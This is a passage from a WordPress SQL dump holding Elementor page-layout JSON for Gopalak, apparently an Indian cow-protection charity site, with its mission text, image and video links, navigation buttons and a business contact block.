"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9770,1644,'_elementor_page_assets','a:0:{}'),(9779,1646,'_elementor_edit_mode','builder'),(9780,1646,'_elementor_template_type','wp-page'),(9781,1646,'_elementor_version','3.7.8'),(9782,1646,'_wp_page_template','elementor_canvas'),(9783,1646,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqh